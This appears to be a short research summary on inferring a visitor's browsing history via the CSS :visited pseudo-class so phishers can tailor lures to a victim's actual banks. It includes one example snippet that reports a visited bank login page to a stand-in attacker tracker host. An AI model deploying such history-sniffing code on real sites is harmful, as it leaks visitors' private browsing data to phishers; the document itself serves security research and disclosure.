Phishing for Clues
Inferring Context Using Cascading Style Sheets and Browser History
Markus Jakobsson, Tom N. Jagatic, and Sid Stamm
The strongest indication consumers get that a particular phishing email is not legit is that it is "sent by" an institution they do not have any relation with. For example, a person who banks with CitiBank and AmeriTrade is not going to believe an email appearing to be sent by Chase or etrade, asking him or her to confirm his password. To improve the yield, phishers are likely to try to automatically extract as much information they can about their victims, then target them in manners that are consistent with the context. More concretely, if a phisher could determine banking relationships, he would not have to spoof the "wrong" entities when targeting victims. Alarmingly, this is rather straightforward to do, and hard to protect against.
One can use a simple technique used to examine the web browser history of an unsuspecting web site visitor using Cascading Style Sheets. This technique is particularly worrisome in the problem domain of phishing. Phishers typically send massive amounts of bulk email hoping their lure will be successful. Given greater context, such lures can be more effectively tailored---perhaps even in a context aware phishing attack. It should be emphasized the following attack can be launched from any arbitrary web site and is embedded in HTML markup. Many web browsers are susceptible.
Cascading Style Sheets (CSS) is a stylesheet language used to describe the presentation of a document written in a markup language, such as HTML. The CSS :visited pseudo-class can be used in the following manner to notify a phisher, Eve, if Alice has visited the web page http://some.bank.com/login. The #foo attribute in this example sets a background property to reference Eve's tracking application http://evil.eve.ws/tracker if the URL http://some.bank.com/login appears in the history of Alice's web browser.
<head> [...] <style type="text/css"> #foo:visited{ background: url(http://evil.eve.ws/tracker?who=alice&what=somebank); } </style> </head> <a id="foo" href="http://some.bank.com/login"></a>A similar technique can be performed by anticipating the time required to perform certain web browser operations, namely, cache hits and misses of targeted content. Felten and Schneider describe this approach in Timing Attacks on Web Privacy.
To learn more about possible countermeasures, please read our paper (pdf) or send us an email.